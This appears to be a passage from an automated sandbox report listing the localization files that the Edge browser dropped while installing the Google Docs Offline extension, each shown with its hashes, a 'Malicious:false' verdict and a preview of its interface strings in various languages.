                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
